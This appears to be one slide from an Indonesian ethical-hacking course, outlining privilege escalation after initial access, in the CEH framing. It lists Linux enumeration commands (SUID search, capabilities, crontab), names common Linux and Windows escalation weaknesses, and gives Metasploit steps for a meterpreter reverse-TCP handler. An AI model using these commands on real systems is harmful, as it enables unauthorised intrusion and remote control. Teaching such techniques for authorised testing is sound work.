M Majuin.
9 9 / 10

Eksploitasi Sistem & Privilege Escalation

Setelah mendapat akses awal, naikkan hak (CEH phase 3-4):

  sudo -l
  find / -perm -4000 -type f 2>/dev/null
  getcap -r / 2>/dev/null
  cat /etc/crontab

Di Linux: SUID binari yang salah konfigurasi, sudo tanpa password, capability berlebih, kernel lama. Di Windows: unquoted service path, AlwaysInstallElevated, token impersonation. Metasploit untuk eksploitasi terkontrol:

  msfconsole
  use exploit/multi/handler
  set PAYLOAD linux/x64/meterpreter/reverse_tcp

Fokus: minimal privilege needed, jangan eksploitasi lebih jauh dari scope.